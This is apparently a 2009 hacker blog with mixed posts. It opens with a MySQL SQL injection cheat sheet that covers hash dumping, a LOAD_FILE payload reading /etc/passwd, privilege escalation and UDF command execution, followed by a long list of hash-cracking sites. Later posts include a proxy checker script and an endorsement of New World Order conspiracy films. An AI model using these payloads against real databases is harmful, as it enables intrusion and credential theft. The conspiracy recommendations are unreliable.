BlackHat Security

SQL Injection Cheat Sheet

0xF blacky — Tue, 19 May 2009 20:54:33 +0000

Version	SELECT @@version
Comments	SELECT 1; #comment SELECT /comment/1;
Current User	SELECT user(); SELECT system_user();
List Users	SELECT user FROM mysql.user; — priv
List Password Hashes	SELECT host, user, password FROM mysql.user; — priv
Password Cracker	John the Ripper will crack MySQL password hashes.
List Privileges	SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; — list user privs SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; — priv, list user privs SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; — list privs on databases (schemas) SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; — list privs on columns
List DBA Accounts	SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘SUPER’; SELECT host, user FROM mysql.user WHERE Super_priv = ‘Y’; # priv
Current Database	SELECT database()
List Databases	SELECT schema_name FROM information_schema.schemata; — for MySQL >= v5.0 SELECT distinct(db) FROM mysql.db — priv
List Columns	SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
List Tables	SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
Find Tables From Column Name	SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘username’; — find table which have a column called ‘username’
Select Nth Row	SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0 SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0
Select Nth Char	SELECT substr(‘abcd’, 3, 1); # returns c
Bitwise AND	SELECT 6 & 2; # returns 2 SELECT 6 & 1; # returns 0
ASCII Value -> Char	SELECT char(65); # returns A
Char -> ASCII Value	SELECT ascii(‘A’); # returns 65
Casting	SELECT cast(‘1′ AS unsigned integer); SELECT cast(‘123′ AS char);
String Concatenation	SELECT CONCAT(‘A’,'B’); #returns AB SELECT CONCAT(‘A’,'B’,'C’); # returns ABC
If Statement	SELECT if(1=1,’foo’,'bar’); — returns ‘foo’
Case Statement	SELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; # returns A
Avoiding Quotes	SELECT 0×414243; # returns ABC
Time Delay	SELECT BENCHMARK(1000000,MD5(‘A’)); SELECT SLEEP(5); # >= 5.0.12
Make DNS Requests	Impossible?
Command Execution	If mysqld (<5.0) is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /usr/lib (or similar). The .so file should contain a User Defined Function (UDF). raptor_udf.c explains exactly how you go about this. Remember to compile for the target architecture which may or may not be the same as your attack platform.
Local File Access	…’ UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) — priv, can only read world-readable files. SELECT * FROM mytable INTO dumpfile ‘/tmp/somefile’; — priv, write to file system
Hostname, IP Address	Impossible?
Create Users	CREATE USER test1 IDENTIFIED BY ‘pass1′; — priv
Delete Users	DROP USER test1; — priv
Make User DBA	GRANT ALL PRIVILEGES ON . TO test1@’%'; — priv
Location of DB files	SELECT @@datadir;
Default/System Databases	information_schema (>= mysql 5.0) mysql

some online hashcracker….

0xF blacky — Sat, 16 May 2009 07:41:28 +0000

http://www.milw0rm.com/cracker/
http://www.plain-text.info/add/
http://www.securitystats.com/tools/hashcrack.php
http://www.passcrack.spb.ru/
http://gdataonline.com/seekhash.php
http://www.md5-brute.com/
http://www.md5encryption.com/
http://www.insidepro.com/hashes.php?lang=rus
http://www.cirt.net/cgi-bin/passwd.pl
http://passcracking.ru
http://www.hashchecker.com/?_sls=add_hash
http://www.tydal.nu/category/
http://md5.dustinfineout.com/
http://www.md5-db.com/
http://www.md5hashes.com/
http://sha1search.com/
http://md5.xpzone.de/
http://www.csthis.com/md5/
http://md5.benramsey.com/
http://www.md5this.com/Cr*ck-it-/index.php
http://hackerscity.free.fr/
http://ice.breaker.free.fr/
http://md5search.deerme.org/
http://www.md5decrypter.com/
http://securitydb.org/cracker/
http://plain-text.info/index/
http://www.tmto.org/?category=main&page=home
http://md5.geeks.li/
http://hashreverse.com/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://md5crack.it-helpnet.de/index.php?op=add
https://astalavista.net/index.php?
http://md5search.uk.to/

MD5:
http://md5.sh4ka.fr
http://74.52.200.226/~b4ck/passhash/index.php
http://www.tmto.org/
http://md5.rednoize.com
http://nz.md5.crysm.net
http://us.md5.crysm.net
http://www.xmd5.org
http://gdataonline.com
http://www.hashchecker.com
http://passcracking.ru
http://www.milw0rm.com/md5
http://plain-text.info
http://www.securitystats.com/tools/hashcrack.php
http://www.schwett.com/md5/ – Does Norwegian words too
http://passcrack.spb.ru/
http://shm.pl/md5/
http://www.und0it.com/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://md5.geeks.li/
http://www.hashreverse.com/
http://www.cmd5.com/english.aspx
http://www.md5.altervista.org/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://alimamed.pp.ru/md5/ (for those who can’t read russian: put your md5 in the second box)
http://md5crack.it-helpnet.de/index.php?op=add
http://cijfer.hua.fi/
http://shm.hard-core.pl/md5/
http://www.mmkey.com/md5/HOME.ASP
http://www.thepanicroom.org/index.php?view=cracker
http://rainbowtables.net/services/results.php
http://rainbowcrack.com/
http://www.securitydb.org/cracker/
http://passwordsecuritycenter.com/in…roducts_ id=7
http://0ptix.co.nr/md5
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com
http://www.pldsecurity.de/forum/md5.php
http://www.xeons.net/genesis/
http://hackerscity.free.fr/
http://bisix.cogia.net/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-Cr*ck/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.jock-security.com/md5_database/?page=Cr*ck
http://c4p-sl0ck.dyndns.org/cracker.php
http://www.blackfiresecurity.com/tools/md5lib.php
http://www.md5-db.com/index.php

MD4:
http://www.securitystats.com/tools/hashcrack.php
http://rainbowtables.net/services/results.php
http://rainbowcrack.com/

SHA1:
http://passcrack.spb.ru/
http://www.hashreverse.com/
http://rainbowcrack.com/
http://www.md5encryption.com/
http://www.shalookup.com/
http://md5.rednoize.com/
http://c4p-sl0ck.dyndns.org/cracker.php
http://www.tmto.org/
http://linardy.com/md5.php
http://www.gdataonline.com/seekhash.php
https://www.w4ck1ng.com/cracker/
http://search.cpan.org/~blwood/Digest-MD5-Reverse-1.3/
http://www.hashchecker.com/index.php?_sls=search_hash
http://www.rainbowcrack-online.com/
http://schwett.com/md5/
http://www.md5.org.cn/index_en.htm
http://www.xmd5.org/index_en.htm
http://nz.md5.crysm.net/
http://us.md5.crysm.net/
http://gdataonline.com/seekhash.php
http://passcracking.ru/
http://shm.pl/md5/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://www.hashreverse.com/
http://alimamed.pp.ru/md5/
http://md5crack.it-helpnet.de/index.php?op=add
http://shm.hard-core.pl/md5/
http://rainbowcrack.com/
http://passwordsecuritycenter.com/index.ph…p;products_id=7
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com/
http://hackerscity.free.fr/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-Cr*ck/
http://passcracking.com/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.md5-db.com/index.php
http://md5.idiobase.de/
http://md5search.deerme.org/
http://sha1search.com/

Angriff auf Berlin – Wie China uns ausspioniert

0xF blacky — Sat, 16 May 2009 06:45:38 +0000

Im Mai 2007 sind Chinesische Hacker heimlich in das Bundeskanzleramt eingedrungen. Tausende Dokumente wurden von der Regierungszentrale gestohlen, und nach China geleitet. Es liegt sehr Nahe, dass die oft Patriotischen Hacker Unterstützung ihrer Regierung bekommen. Wobei diese alles abstreitet. China ist bereits bekannt für seine Vorreiterstellung in Sachen Cyber Krieg und Online Spionage. Das Internet nimmt eine immer wichtigere Rolle in der Kriegs und Spionage Führung ein. Klar, es wird ja auch weltweit von fast allen Behörden genutzt. Die Dokumentation ist wirklich zu empfehlen.

Doku starten…

More:

heise online Meldung von 25.08.07

Fun Things ToDo With Your Mom

0xF blacky — Thu, 14 May 2009 17:38:55 +0000

ION3 – Der Tilling Fenstermanager

0xF blacky — Wed, 13 May 2009 12:57:47 +0000

Hey,

Ich habe in meiner Linux Laufzeit schon viele verschiedene window manager/Desktop Umgebungen ausprobiert. Vom klickbunti KDE bis zur Fluxbox war alles dabei. Jedoch möchte ich euch heute, vom dem sicher noch nicht jedem bekannten window manager Ion berichten.

Ich arbeite schon ca 2 Monate damit und bin vollständig zu Frieden

Bei Ion, dieser zurzeit in Version 3 erhältlich ist, handelt es sich um einen window manager dieser volle Tastatur Bedienung unterstützt, hierbei arbeitet dieser mit dem „Tilling“ Modus und über sogenannte frames. Alternativ lassen sich für Anwendungen wie z.B The Gimp auch Fenster in den floating Modus versetzen, wie man es von anderen WM’s gewöhnt ist, somit ist die gewohnte Bedienung relativ gut möglich. Die Frames sind beliebig auf dem Bildschirm ausrichtbar (Größe und Höhe) und füllen somit immer den gesamten Schirm. Ich finde das vorteilhaft, da man eben kaum mal die Übersicht verliert. Weiterhin werden mehrere Clients in einem Frame in Tabs unterteilt, wie man es auch von den Browser Familien gewohnt ist.

Ion3 in Aktion (Alsa Mixer,Irssi (IRC), und Conky

Die Tabs und Frames können einzeln über die Tastatur shortcuts angesprochen und bearbeitet werden. Ion3 ist ebenso Super erweiterbar wie funktional. Verdanken hat er dies, einer Schnittstelle zur Scriptsprache LUA.

Tasten Kombinationen. (ubuntuusers.de)

Tastenkürzel	Wirkung
Alt + F9	neuen Workspace erstellen
Alt + 0 bis 9	zu den Workspaces springen
Alt + , / .	zum vorigen/nächsten Workspace springen
Alt + Tab ⇆ / P / N	zum Frame rechts/oben/unten vom aktuellen
Alt + K + N / P	zum nächsten / vorigen Tab innerhalb des Frames
Alt + K K	zu Anwendung, die Aufmerksamkeit verlangt
Alt + S	Frame vertikal aufteilen
Alt + K + S	Frame horizontal aufteilen
Alt + H / V	Frame horizontal / vertikal maximieren
Alt + ⏎	Vollbildmodus für aktuelle Anwendung umschalten
Alt + A	Frame in vorhandenes Tiling einbinden
Alt + K + B	Frame in neues Tiling einbinden
Alt + K + R	ausgewählen Frame nach vorne holen
Alt + R	Größenänderungsmodus
⏎	Größenänderungsmodus verlassen
nichts / ⇧ / Alt + B / F / P / N	vergrößern / schrumpfen / bewegen nach rechts / links / oben / unten im Größenänderungsmodus
Alt + [linke Maustaste auf Tab]	Frame verschieben
[linke Maustaste auf Rand] oder Alt + [rechte Maustaste auf Tab]	Größe des Frames ändern
Alt + C	markierte Anwendung schließen
Alt + K + C	Beenden der markierten Anwendung erzwingen („kill“)
F2	Xterm starten
F3	Startmenü
F9	Workspace-Abfrage (siehe Layouts)
F12	Ion3 Hauptmenü
Alt + G	Liste aller Fenster anzeigen

Es ist Geschmackssache ob man mit einem window manager wie ION glücklich wird. Mir gefällt er wirklich sehr. Da ich schon immer fan vom schlichten und übersichtlichem war, ist dies genau das richtige für mich. Außerdem ist die große Freiheit alles mit der Tastatur zu bedienen, doch echt 1337 oder? ;-P

Hier geht es zur Offiziellen Webseite, auf dieser ihr auch schöne LUA Modifikationen erhaltet.

Vergleichbares zu ION wären z.B WMII , RatPoison oder auch LarsWM.

Das war’s mal wieder von mir

GreeZ

ach, btw http://iki.fi/tuomov/dl/ion-3ds-20070318.tar.gz *g

[Perl] Socks5/Proxy list Checker

0xF blacky — Sun, 10 May 2009 11:22:52 +0000

#!/usr/bin/perl
#Socks/Proxy Checker!
use IO::Socket;
print qq „
~~~~~~~~~~~~~~~~~~~~~~~
Socks5 Checker\n
by Blacky\n
Usage $0 liste timeout goodput badput timeout\n
Usage $0 list.txt proxylist.txt dontwork.txt 3\n
~~~~~~~~~~~~~~~~~~~~~~~
„;
my $liste = $ARGV[0];
my $working = $ARGV[1];
my $notwork = $ARGV[2];
my $timeout = $ARGV[3];
chomp($working);
chomp($notwork);
chomp($timeout);
open (proxylist, „>>$working“) or print „Protokoll Datei nicht gefunden\n“;
open(notw, „>>$notwork“) or print „Keine Datei angegeben!\n“;
open(liste, „<$liste“) or print „Keine Proxy Liste!\n“;
while() {
print „Prüfe…\n“;
$proxys = $_;
chomp($proxys);
@list = split(/:/, $proxys); # Trenne IP:PORT
$try = IO::Socket::INET->new (
PeerAddr => $list[0],
PeerPort => $list[1],
Timeout => $timeout, #sek?
);
if ($try) {
print „Verbindung zu $list[0] auf $list[1] erfolgreich\n“;
print proxylist „$list[0]\:$list[1]\n“;
}
else
{
print „Verbindung zu $list[0] auf $list[1] fehlgeschlagen!\n“;
print notw „$list[0]\:$list[1]\n“;
}
}

Usage sollte alles erklären  

Viel Spaß Damit!

Just victims of the in-house drive-by

0xF blacky — Fri, 01 May 2009 19:33:47 +0000

http://www.youtube.com/watch?v=e0j0GCbMC7A

They say jump, you say how high!

Clipboard – simple desktop notice

0xF blacky — Thu, 30 Apr 2009 13:44:34 +0000

Huhu,

Da ich früher mal Visual Basic Programmierte(Ich Programmiere gerne Krankheiten ;D), und es einfach mal wieder „tun“ wollte, habe ich mir die „Linux Variante“ Gambas angeschaut. Bei Gambas handelt es sich um eine VB Ähnliche Basic Sprache (Dialekt). Als kleines start Projekt, habe ich mir einen Text Cliper zusammengebastelt. Ich taufe ihn „Clipboard“.

Clipboard in Aktion

Installation:

Für Debian oder Ubuntu User, einfach das *.deb Package mit dpkg installieren

http://localhostr.com/files/36276b/clipboard_v0.0.1_i368_linux_debian.deb

$ dpkg -i clipboard_v0.0.1_i368_linux_debian.deb

Die Software ist danach (Gnome und KDE) unter „System“ auffindbar.

Für andere Distributionen kann ich Portierungen vornehmen, oder euch die tar.gz anbieten.

http://localhostr.com/files/431ce2/clipboard_v0.0.1_i368_linux_debian.tar.gz

Auf großartiges Eye Candy habe ich verzichtet, wer Bugs findet, oder Wünsche hat, kann sich gerne melden.

Steht natürlich unter der GPL

Insgesamt ist Gambas ganz nett, von der IDE kann es mit Visual Basic 6 und Co mithalten, wobei es viele neue Funktionen wie das Programmieren von CGI Webanwendungen bietet. Die Syntax abweichungen sind wirklich gering und es ist leicht wieder einzutauchen Für Leute welche mal etwas „quick’n dirty“ unter Linux verwirklichen wollen, gut geeignet.

Wobei ich Perl, doch mehr mag

GreeZ!

NWO – New World Order

0xF blacky — Wed, 29 Apr 2009 19:14:03 +0000

Viele Menschen sind davon überzeugt, das unser Kapitalistisches System, von einer kleinen Elite, auserwählter „Machthaber“ kontrolliert wird. Ein Solches System gleicht eben keiner Freien Gesellschaft mehr, sondern eher einer Diktatur. Leider geben uns heutige Geschehnisse, wie z.B Vorrats Daten Speicherung oder Zensur, oft zum Nachdenken über solch ein Thema.

Ein Parr nette Dokumentationen, zu dem Thema „New World Order“

Erstens, kann ich „Terror Storm“ empfehlen, von Alex Jones

http://www.infokrieg.tv/terrorstorm_2nd_edition_deutsch.html

Und als meinem Persönlichen Favorit, Zeitgeist und Zeitgeist 2.

http://infokrieg.tv/zeitgeist_deutsch.html

Zeitgeist 2

http://www.youtube.com/watch?v=LohVMfS4aBg&feature=PlayList&p=204F57F161DE3CA3&index=0

Schaut es euch an, und lasst es euch durch den Kopf gehen

Socks 5 Tutorial

0xF blacky — Wed, 29 Apr 2009 19:04:13 +0000

Auf Anfrage eines Users, werde ich das Socks5 Tutorial für Unix Systeme, morgen nocheinmal überarbeiten und verbessern. Leider kann ich euch die Alte version nicht mehr Posten, da ich es einfach nicht mehr finde :/

Tut mir leid.

GreeZ

Blacky.